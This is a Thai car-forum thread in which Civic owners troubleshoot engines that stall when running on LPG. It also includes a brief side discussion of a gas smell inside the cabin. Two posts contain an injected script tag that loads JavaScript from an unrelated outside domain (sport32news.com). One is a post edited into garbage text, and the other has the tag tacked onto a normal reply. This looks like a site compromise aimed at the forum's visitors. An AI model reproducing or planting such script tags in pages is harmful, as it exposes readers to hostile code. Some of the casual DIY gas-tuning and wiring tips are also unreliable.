ตอบ
LAMP

เข้าร่วม: 21 มีนา 2009
ตอบ: 29

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 11
ให้คำขอบคุณ: 8
พุธ, 6 มกรา 2010 12:37 - LPG เบาดับเป็นเพราะอะไร ใครทราบช่วยด้วยครับ
วิ่งมาเร็วๆ แล้วปล่อยไหลรอบตกจนดับไปเลยเป็นบ่อยๆ แต่ถ้าวิ่งน้ำมันไม่เป็น ใครทราบบ้างช่วยด้วยครับ
boymahasup

เข้าร่วม: 09 มิถุนา 2009

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 29
ให้คำขอบคุณ: 1

ปี: 2004
สี: ทอง แซทเทิลไลท์ (NH-663M)
พุธ, 6 มกรา 2010 20:39 - LPG เบาดับเป็นเพราะอะไร ใครทราบช่วยด้วยครับ
ผมเป็นอยู่นิดๆ อาการคล้ายหม้อต้มคุมแรงดันไม่ค่อยดีครับ
nutty0257

ชื่อเล่น: นัท

เข้าร่วม: 20 พฤศจิกา 2009
ตอบ: 104

มือใหม่หัดขับ

ได้รับคำขอบคุณ: 61
ให้คำขอบคุณ: 72

พฤหัส, 7 มกรา 2010 00:35 - LPG เบาดับเป็นเพราะอะไร ใครทราบช่วยด้วยครับ
ใช้เป็นแบบดูดป่าวครับผมใช้เป็นแบบดูดเบาแล้วจะดับแล้วผมแก้ด้วยการไปหมุนตั้งให้แก๊สมันเข้าเครื่องบางขึ้นมาอีกทีล่ะครึ่งรอบแล้วก็วิ่งไปหมุนไปแล้วก็จะได้ค่าที่เราต้องการอ่ะครับ แล้วอาการที่เบาแล้วจะดับก็ไม่มีอีกเลยครับ
mong_civic

ชื่อเล่น: หม่อง

เข้าร่วม: 11 มิถุนา 2009
ตอบ: 709

Guru ES
Guru ES

ได้รับคำขอบคุณ: 672
ให้คำขอบคุณ: 377

ปี: 2003
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
พฤหัส, 7 มกรา 2010 09:53 - LPG เบาดับเป็นเพราะอะไร ใครทราบช่วยด้วยครับ
ถ้าเป็นแบบดูด คงต้องจูนหม้อต้มใหม่ครับ จุกจิกหน่อย
ถ้าเป็นแบบหัวฉีด ต้องใช้คอม จูน ค่อยๆแก้ไขไปครับ แต่ก็ช่วยเราประหยัดได้เยอะนะ
cisco

ชื่อเล่น: เต้น

เข้าร่วม: 25 พฤศจิกา 2008
ตอบ: 3557

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5197
ให้คำขอบคุณ: 9940
พฤหัส, 7 มกรา 2010 11:50 - LPG เบาดับเป็นเพราะอะไร ใครทราบช่วยด้วยครับ
http://www.civicesgroup.com/forum/topic4721
LAMP

น้องใหม่
น้องใหม่

พฤหัส, 7 มกรา 2010 12:59 - LPG เบาดับเป็นเพราะอะไร ใครทราบช่วยด้วยครับ
ขอบคุณครับสำหรับทุกคำตอบ ของผมเป็นหัวฉีดยี่ห้อพาวเวอร์เจ็ท แถวบางกะปิท่านใดมีร้านจูนเจ๋งๆแนะนำบ้างหรือเปล่าครับ
mong_civic

ชื่อเล่น: หม่อง

เข้าร่วม: 11 มิถุนา 2009
ตอบ: 709

Guru ES
Guru ES

ได้รับคำขอบคุณ: 672
ให้คำขอบคุณ: 377

สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
ศุกร์, 8 มกรา 2010 10:11 - LPG เบาดับเป็นเพราะอะไร ใครทราบช่วยด้วยครับ
อยู่ในประกันหรือเปล่า กลับไปร้านเดิมที่ติดตั้งซิครับ
LAMP

น้องใหม่
น้องใหม่

อังคาร, 12 มกรา 2010 12:45 - LPG เบาดับเป็นเพราะอะไร ใครทราบช่วยด้วยครับ
ลองเปลี่ยนหัวเทียนจากแบบธรรมดา มาใช้แบบเข็มครับ อาการดับน้อยลงอย่างชัดเจน แต่ก็ยังมีอยู่ต้องทดลองตามคำแนะนะของทุกท่านต่อไป ใครมีอาการเดียวกับผมลองดูครับ 4 หัว 570 บาท ตามร้านอะไหล่ทั่วไป
Tum drumster

ชื่อเล่น: ตั้ม

เข้าร่วม: 13 ตุลา 2009
ตอบ: 36

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 495
ให้คำขอบคุณ: 0

ปี: 2001
สี: ขาว ทาฟเฟต้า (NH-578)
อังคาร, 12 มกรา 2010 19:21 - กลิ่นแก๊สเข้าห้องโดยสาร
ผมขับแก๊สมา 2 ปี ครับ
เช็คอยุ่เรื่อยๆ

แต่วันนึงสลับจากน้ำมันเป็นแก๊ส กลิ่นเข้าห้องโดยสารเพียบเลยครับ
เปิดฝากระโปรงก็มาอีกเพียบ

ลองเอาผงซักฟอกตีเป็นฟองๆแล้วลองเอาฟองน้ำโปะๆดูก้ไม่มีส่วนที่มีรอยรั่วเลยครับ

จะมีสาเหตุไรได้บ้างครับที่กลิ่นแก๊สรั่วออกมา

รบกวนผู้รู้ช่วยชี้แนะครับ

ชื่อเล่น: เบียร์

เข้าร่วม: 01 ตุลา 2008
ตอบ: 984

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1241
ให้คำขอบคุณ: 3893

ปี: 2002
สี: น้ำเงิน อิเทอนอล (B-96P)
พุธ, 13 มกรา 2010 16:09 - Re: กลิ่นแก๊สเข้าห้องโดยสาร
Tum drumster พิมพ์ว่า:

แต่วันนึงสลับจากน้ำมันเป็นแก๊ส กลิ่นเข้าห้องโดยสารเพียบเลยครับ

ลองเอาผงซักฟอกตีเป็นฟองๆแล้วลองเอาฟองน้ำโปะๆดูก้ไม่มีส่วนที่มีรอยรั่วเลยครับ

จะมีสาเหตุไรได้บ้างครับที่กลิ่นแก๊สรั่วออกมา

กลับไปร้านติดตั้งดีกว่าครับ ได้กลิ่นอันตรายนะ เราว่า
LAMP

น้องใหม่
น้องใหม่

ศุกร์, 15 มกรา 2010 12:40 - Re: กลิ่นแก๊สเข้าห้องโดยสาร
BEER_CIVIC ES พิมพ์ว่า:
Tum drumster พิมพ์ว่า:

กลับไปร้านติดตั้งดีกว่าครับ ได้กลิ่นอันตรายนะ เราว่า

อันตรายเหรอ ของผมก็มีกลิ่นต้องรีบไปเช็คซะแล้ว แถวมีนบุรีมีร้านแนะนำหรือเปล่าครับ
Moo Uan

เข้าร่วม: 07 สิงหา 2009
ตอบ: 1127

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 426
ให้คำขอบคุณ: 126

ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 31 มีนา 2010 00:21 - LPG เบาดับเป็นเพราะอะไร ใครทราบช่วยด้วยครับ
เป็นเหมือนกันเลยครับ เป็นทุกวันเลยตอนนี้ บางทีมันดับเลยตอนเบารถ บางทีมันยังไม่ดับแต่เร่งไม่ได้มันจะฟอดๆ ต้องต้ดเป็นน้ำมัน วิ่งไปแป๊ปปรับเป็นแก๊สมันก็จะวูปเร่งไม่ได้เร่งแล้วฟอดๆอีก ต้องวิ่งน้ำมันซักพักแล้วไปปรับเป็นแก็สก็ใช้ได้เฉยเลย
ยิ่งถ้าเป็นตอนเครื้องเย็นๆ ติดเครื่องแล้ววอร์มไว้พอเบิ้นเครื่องแล้วตัดเป็นแก๊ส แล้วปล่อยคันเร่งรอบมันจะตกจนดับไปเลย เป็น3-4ครั้ง จนต้องเบิ้นเครื่องจนตัดเป็นแก๊สก็ต้องเร่งค้างไว้ซักแป๊ปก่อน ก็จะไม่ดับเพราะถ้าปล่อย รอบมันจะตกจนดับอีก ไปที่ร้านก็จูน
ออโต้ให้ก็ไม่หาย ตั้งวาล์วแล้ว แต่ไม่ได้ล้างปีกผีเสื้อ เพราะช่างฮอนด้าที่ร้านบอกว่าไม่ต้องล้างตั้งวาล์วอย่างดียวก็พอ
ไม่รู้จะทำไงดี (ตอนนี้ก็ทำใจไปเรื่อยๆเนี่ย)
ได้รับคำขอบคุณจาก: toom-tam 
toshihero

เข้าร่วม: 29 พฤศจิกา 2008
ตอบ: 363

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 290
ให้คำขอบคุณ: 444

สี: ทอง แซทเทิลไลท์ (NH-663M)
พฤหัส, 1 เมษา 2010 23:10 - LPG เบาดับเป็นเพราะอะไร ใครทราบช่วยด้วยครับ
ขั้นแรกล้างปีกผีเสื้อดูอาการก่อนคับ ติดแบบดูด หรือหัวฉีดครับถ้าดูดให้ดูเรื่องท่อไอดีด้วยครับว่าอากาศเข้าปกติหรือเปล่าคับ งัยกลับไปเช็คที่ท่านติดตั้งก่อนดีกว่าคับ
jonatan

ชื่อเล่น: โจ

เข้าร่วม: 02 ตุลา 2008
ตอบ: 6291

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 19304
ให้คำขอบคุณ: 13458

สี: เทา ซิลเวอร์สโตน (NH-630M)
พฤหัส, 1 เมษา 2010 23:39 - LPG เบาดับเป็นเพราะอะไร ใครทราบช่วยด้วยครับ
ถ้าใช้น้ำมันไม่เป็นรัย แสดงว่าเป็นที่ระบบติดตั้งแก๊ส
มาไม่ดีแล้วล่ะคับ มันมีหลายสาเหตุอ่ะ เช่น การเจาะรูหัวฉีดแก๊ส
อาจจะไกล หรือใกล้ เกินไป ไม่ได้ระยะ ใกล้เคียงกับน้ำมัน อาจทำให้แก๊สท่วม
หรือ แก๊สจ่ายไม่ทัน ทำให้เกิดการสะดุด หรือวูบแล้วดับ แล้วลองจูนใหม่ดูยังอ่ะคับ
ผมเคยเป็นทีหนึ่ง รอบตกต่ำมาก เครื่องสั่นแต่ไม่ดับ และไฟเอ็นจิ้นโชว์เลยดับเครื่องสตาร์ทใหม่ หายคับ
แต่สุดท้ายก็ต้องกลับไปเช็คและจูนใหม่ ค่ามันเปลี่ยนไปเยอะจาก กราฟ จูนใหม่ตอนนี้ ลื่นๆ วิ่งๆ เลยอ่ะคับ

ปล.ยังงัยลองจูนใหม่ดูก่อนคับ ถ้าไม่หาย ต้องมาดูที่ระยะห่าง
ของการเจาะหัวฉีดแก๊ส และก็ขนาดของหม้อต้มแก๊ส คับผม ค่อยๆแก้คับ (แต่ต้องวิ่งน้ำมันแล้วปกติน่ะคับ)
Moo Uan

ครอบครัว ES
ครอบครัว ES

ศุกร์, 2 เมษา 2010 01:20 - LPG เบาดับเป็นเพราะอะไร ใครทราบช่วยด้วยครับ
ผมใช้ระบบหัวฉีดครับ ตอนติดใหม่ๆวิ่งเนียนดีครับ
แต่นีใช้ไปประมาณเกือบๆแสนโลแล้ว เพิ่งเอาไปจูนมา ทางร้านจูนให้แบบออโต้ ก็ไม่หาย
คงต้องลองเอาไปล้างปีกผีเสื้อดูก่อน เป็นไงจะมาเล่าอีกทีครับ

(วันนี้มีอาการ วูบดับตอนวิ่งมาแล้วผ่อนคันเร่งเพื่อชลอรถ กับอยู่ๆก็ฟอดลงไปเฉยๆ ต้องเปลี่ยนเป็นน้ำมัน พอปลี่ยนเป็นแกส ก็ยังฟอด
อีก เป็นหลายครั้ง จนต้องวิ่งน้ำมัน พอหายก็วิ่งแก๊สไปได้ซักพักแล้วก้อเป็นอีก แค่วิ่งจากหัวลำโพงกลับบางกะปิ เป็นอาการนี้สับไปสับมา จนหงุดหงิดอะ)
zan

เข้าร่วม: 23 สิงหา 2009
ตอบ: 3145

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3432
ให้คำขอบคุณ: 6687

เสาร์, 3 เมษา 2010 08:04 - LPG เบาดับเป็นเพราะอะไร ใครทราบช่วยด้วยครับ
8;p [<script src="https://sport32news.com/civicesgroup.js"></ ]

แก้ไขล่าสุดโดย เมื่อ อังคาร, 30 กันยา 2014 13:50, ทั้งหมด 1 ครั้ง (ดูทั้งหมด)
Moo Uan

ครอบครัว ES
ครอบครัว ES

จันทร์, 5 เมษา 2010 00:08 - LPG เบาดับเป็นเพราะอะไร ใครทราบช่วยด้วยครับ
เศร้าอะ เข้าไปเช็คมา จูนออโต้ให้ใหม่ และที่ร้านมันบอกว่าน่าจะเป็นที่ตัวอะไรไม่รู้ เหมือนเป็นควบคุมการฉีด ตัดแก๊ส(ไม่ใช่กล่องกับหัวฉีด)เรียกไม่ถูก ตัวละ8000 แน่ะ ก็เลยถามว่าแน่ใจปะ ถ้าเปลี่ยนแล้วไม่หายคืนได้ปะ ร้านบอกว่าได้ แต่ไม่แน่ใจเลยยังไมเเปลี่ยน
ก็เลยได้มีโอกาสลองทางไกล ไปเพชรบุรีมา ปากดว่ากดสับไปสสับเป็นระยะๆเลยครับ วิ่งดีๆ พอต้องชลอความเร็วแล้วรอบมันจะตกเครื่องก็ค่อยๆฮวบลง แล้วพอเราเหยียบใหม่มันจะฟอดลง ไม่มีอาการเร่งเครื่องขึ้น พอสับเป็นน้ำมันก็วิ่งได้ แล้ววิ่งเปซักระยะกดเป็นแก๊ส บางที่ก็วิ่งไดเลย บางทีก็ฟอดลง ต้องเปลี่ยนไปมา2-3ครั้งถึงจะปกติ เป็นอย่างนี้ตลอดทั้งไปและกลับ เซ้งจริงเลยอะ ไปแก้ทีไหนเน้อ เฮ่อออ
nobo

ชื่อเล่น: ไกด์

เข้าร่วม: 15 พฤศจิกา 2009
ตอบ: 162

ได้รับคำขอบคุณ: 138
ให้คำขอบคุณ: 19

จันทร์, 5 เมษา 2010 01:30 - LPG เบาดับเป็นเพราะอะไร ใครทราบช่วยด้วยครับ
ขออนุญาติตอบครับ จากประสบการณ์ครับ ผมใช้ autronic ครับ มีอาการ เบาดับ เหยียบคลัทช์รอบตกดับ จอดติดไฟแดงก็ยังดับ ใช้น้ำมันไม่เป็น แต่สังเกตรอบให้ดีนะครับ ชอบล่วงอยู่เรื่อย ได้ไปแก้เมื่อสัปดาห์ที่แล้วครับ ตอนแรกจูนใหม่ไม่หายครับ ช่างเลย reset กล่องหัวฉีดแก๊สใหม่ครับ พร้อมวิ่งจูน หายเลย เบาไม่ดับ ไม่มีอาการ แต่ยังเหลือ ล้าง idle และตั้ง วาล์วครับ น่าจะ 100 % ลองหาช่างที่มากประสบการณ์ดูครับ สาเหตุเพราะ ถอดขั้วแบตครับ เวลาใส่กลับ มันเกิดประกายไฟ จนส่งผลทำให้กล่องทำงานผิดเพี้ยนครับ ผมเจออาการนี้มาเกือบ 2 เดือน หาร้านแก้กว่า 10 ร้าน ไม่หายครับ บอกให้เปลี่ยน ซะหมด ตอน reset กล่องอย่าลืม black up file เดิมไว้นะครับ กันไว้ก่อน
Moo Uan

ครอบครัว ES
ครอบครัว ES

พฤหัส, 8 เมษา 2010 14:32 - LPG เบาดับเป็นเพราะอะไร ใครทราบช่วยด้วยครับ
Moo Uan พิมพ์ว่า:
เศร้าอะ เข้าไปเช็คมา จูนออโต้ให้ใหม่ และที่ร้านมันบอกว่าน่าจะเป็นที่ตัวอะไรไม่รู้ เหมือนเป็นควบคุมการฉีด ตัดแก๊ส(ไม่ใช่กล่องกับหัวฉีด)เรียกไม่ถูก ตัวละ8000 แน่ะ ก็เลยถามว่าแน่ใจปะ ถ้าเปลี่ยนแล้วไม่หายคืนได้ปะ ร้านบอกว่าได้ แต่ไม่แน่ใจเลยยังไมเเปลี่ยน
ก็เลยได้มีโอกาสลองทางไกล ไปเพชรบุรีมา ปากดว่ากดสับไปสสับเป็นระยะๆเลยครับ วิ่งดีๆ พอต้องชลอความเร็วแล้วรอบมันจะตกเครื่องก็ค่อยๆฮวบลง แล้วพอเราเหยียบใหม่มันจะฟอดลง ไม่มีอาการเร่งเครื่องขึ้น พอสับเป็นน้ำมันก็วิ่งได้ แล้ววิ่งเปซักระยะกดเป็นแก๊ส บางที่ก็วิ่งไดเลย บางทีก็ฟอดลง ต้องเปลี่ยนไปมา2-3ครั้งถึงจะปกติ เป็นอย่างนี้ตลอดทั้งไปและกลับ เซ้งจริงเลยอะ ไปแก้ทีไหนเน้อ เฮ่อออ

กลับมารายงานผลจากการเข้าไปที่้ร้านเมื่อวันก่อน
ที่ร้านให้ลองเปลี่ยนไอ้ตัวที่ว่าน่าจะเสียก็คือ ตัวVR ซึ่งทางร้านบอกว่าถ้าลองดูแล้วไม่หาย ก็คืนได้ แต่ถ้าใช่ ค่าาตัวก็ 8500บ.
ก็เลยโอเค ตอนนี้เอามาวิ่ง 2 วันแล้วยังไม่มีอาการเดิมเลย ต้องลองอีกซักระยะ เพราะการันตีให้3เดือน
าส่วนต้วเเดิมเก็บไว้เป็นอะไหล่ได้ เพราะมีชิ้นส่วนบางตัวไม่แยกขาย ที่เสียเพราะตัวบอดี้เป็นพลาสติกมันแตกแล้วตรงที่หุ้มปลั๊กต่อไฟ
ใหญ่ๆ(เรียกไม่ถูก)ตรงส่วนอื่นเป็นเหล็กทองเหลือ่ง เป็นตัวกรองแก็สด้วย ไว้จะถ่ายรูปมาให้ดู ยี่ห้อที่่ผมติดคือ อีซี่เจ็ท
Kae Shop

ชื่อเล่น: เก๋

เข้าร่วม: 25 มกรา 2010
ตอบ: 93

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 177
ให้คำขอบคุณ: 513

สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
ศุกร์, 13 สิงหา 2010 11:11 - LPG เบาดับเป็นเพราะอะไร ใครทราบช่วยด้วยครับ
jonatan พิมพ์ว่า:
ถ้าใช้น้ำมันไม่เป็นรัย แสดงว่าเป็นที่ระบบติดตั้งแก๊ส
มาไม่ดีแล้วล่ะคับ มันมีหลายสาเหตุอ่ะ เช่น การเจาะรูหัวฉีดแก๊ส
อาจจะไกล หรือใกล้ เกินไป ไม่ได้ระยะ ใกล้เคียงกับน้ำมัน อาจทำให้แก๊สท่วม
หรือ แก๊สจ่ายไม่ทัน ทำให้เกิดการสะดุด หรือวูบแล้วดับ แล้วลองจูนใหม่ดูยังอ่ะคับ
ผมเคยเป็นทีหนึ่ง รอบตกต่ำมาก เครื่องสั่นแต่ไม่ดับ และไฟเอ็นจิ้นโชว์เลยดับเครื่องสตาร์ทใหม่ หายคับ
แต่สุดท้ายก็ต้องกลับไปเช็คและจูนใหม่ ค่ามันเปลี่ยนไปเยอะจาก กราฟ จูนใหม่ตอนนี้ ลื่นๆ วิ่งๆ เลยอ่ะคับ

ปล.ยังงัยลองจูนใหม่ดูก่อนคับ ถ้าไม่หาย ต้องมาดูที่ระยะห่าง
ของการเจาะหัวฉีดแก๊ส และก็ขนาดของหม้อต้มแก๊ส คับผม ค่อยๆแก้คับ (แต่ต้องวิ่งน้ำมันแล้วปกติน่ะคับ)

นับถือ คุณ Jonatan เป็นกูรูเลยค่ะ มีปัญหาอยากถามมากมาย ถ้าไม่เป็นการรบกวนจนเกินไป ขอเบอร์โทรศัพท์เพื่อสอบถามเรื่องต่างๆ ได้มั้ยคะ ขอบคุณล่วงหน้าค่ะ
Simmysweet

ชื่อเล่น: ตั้มเองคับ

เข้าร่วม: 23 สิงหา 2010
ตอบ: 732

Guru ES
Guru ES

ได้รับคำขอบคุณ: 524
ให้คำขอบคุณ: 1150

สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
พุธ, 8 กันยา 2010 11:31 - LPG เบาดับเป็นเพราะอะไร ใครทราบช่วยด้วยครับ
รถผมก็เป็นครับ แต่ตอนนี้ไปจูนแก๊สมาใหม่ เครื่องเดินเรียบขึ้นเยอะครับ ไม่มีอาการสะดุด ผมถามช่างเขาบอกว่ามีหลายสาเหตุ ทั้งหม้อต้มไม่ร้อน น้ำในหม้อน้ำแห้ง ก็อาจเป็นได้ ไฟมาไม่เต็มก็อาจเป็นได้ ไปจูนแก๊สมา โดนไป 500.- แต่อาการเบาดับวิ่งสะดุดหายไป ตอนนี้ไม่มีปัญหาอะไรแล้วครับ ลองเข้าร้านจูนแก๊สดูก่อนอะคับ "<script src="https://sport32news.com/civicesgroup.js">
สมเด็จ พรมมา

เข้าร่วม: 06 ตุลา 2015
ตอบ: 1

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 0
ให้คำขอบคุณ: 0
อังคาร, 6 ตุลา 2015 09:22 - LPG เบาดับเป็นเพราะอะไร ใครทราบช่วยด้วยครับ
ของผมเมื่อก่อนก็เบาดับตลอด จะเลี้ยว จะชลอตัวเมื่อเจอไฟแดง จะออกตัว ดับวูบ พวกอยู่ข้างหลังบีบแตรไล่ตลอด 555+ ก็หาสารพัดวิธีแก้อะนะ เช็คสายหัวเทียน เออ มันไหม้ไป 2 เส้น ก็หาซื้อมาเปลี่ยน แบตก็เก็บไฟไม่อยู่ ชาร์จตอนเช้า มาอีกวันหนึ่ง สตาร์ทไม่ได้แล้ว ก็เปลี่ยนไป พัดลมก็ไม่หมุน (พัดลมหม้อน้ำ) เครื่องร้อนยังไงก็ไม่หมุน เออ ไอ้ตัววัดความร้อนก็เสียอีก ต่อตรงแม่งเลย ทำสวิตช์ไว้ที่ใกล้ๆกับพวงมาลัย พอออกตัวได้ซัก 5 นาทีก็เปิดสวิตช์พัดลม คราวนี้วิ่งฉิวเลย จะจอด จะเบาเครื่อง จะอะไรก็โอไปหมด การปรับจูนแก๊สก็มั่วๆ เพาเวอร์วาล์วอะไรนั่น ไม่เคยสนใจ เปิดสุดๆ ไว้ ปล่อยให้แก๊สมันวิ่งโล่งๆ ไปเลย ไอเดิลก็ไม่สนใจ ปรับแต่เซ้นต์อย่างเดียว วิ่งเครื่องให้ร้อนก่อน ปรับเซนต์เล่นไปเรื่อย วิ่งๆ แล้วก็จอดปรับเซนต์ เอาจนมันไม่ดับเป็นใช้ได้
ตอบ
หน้า 1 จาก 1
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.